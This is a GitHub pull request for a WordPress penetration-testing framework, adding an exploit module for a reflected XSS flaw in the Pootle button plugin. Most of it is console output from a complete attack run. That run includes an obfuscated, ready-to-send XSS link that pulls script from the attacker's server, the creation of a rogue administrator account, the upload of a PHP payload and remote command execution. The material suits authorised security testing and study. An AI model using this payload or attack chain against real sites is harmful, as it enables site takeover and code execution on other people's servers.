search

rastating / wordpress-exploit-framework

A Ruby framework designed to aid in the penetration testing of WordPress systems.
https://rastating.github.io/wordpress-exploit-framework
GNU General Public License v3.0
1.02k stars 265 forks source link

Add Module for pootle button reflected xss shell upload (WPVDB:8930) #45

Closed phyushin closed 6 years ago

phyushin commented 6 years ago

This module exploits the "Pootle button" WordPress plugin; the plugin can be downloaded from the following URL: https://wpvulndb.com/plugins/pootle-button

Fixed in : 1.2.0

References:

example output:

wpxf > use exploit/pootle_button_reflected_xss_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::PootleButtonReflectedXssShellUpload:0x000000017955f8>

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set host 192.168.0.196

  [+] Set host => 192.168.0.196

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set xss_host 192.168.0.2

  [+] Set xss_host => 192.168.0.2

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001435a70>

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set http_server_bind_address 192.168.0.2

  [+] Set http_server_bind_address => 192.168.0.2

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/pootle_button_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.196/wp-admin/admin-ajax.php?action=pbtn_dialog&assets_url=%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C77%2C85%2C104%2C87%2C104%2C78%2C118%2C101%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E%3C

  [-] Started HTTP server on 192.168.0.2:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, ogdbgk:rKSqoWxUqw
  [-] HTTP server stopped
  [-] Authenticating with WordPress using ogdbgk:rKSqoWxUqw...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.196/wp-content/plugins/SweYHnzBkG/IiXkVyZeim.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/pootle_button_reflected_xss_shell_upload] >
rastating commented 6 years ago

Merged in bb44cf6

Thanks! :tada: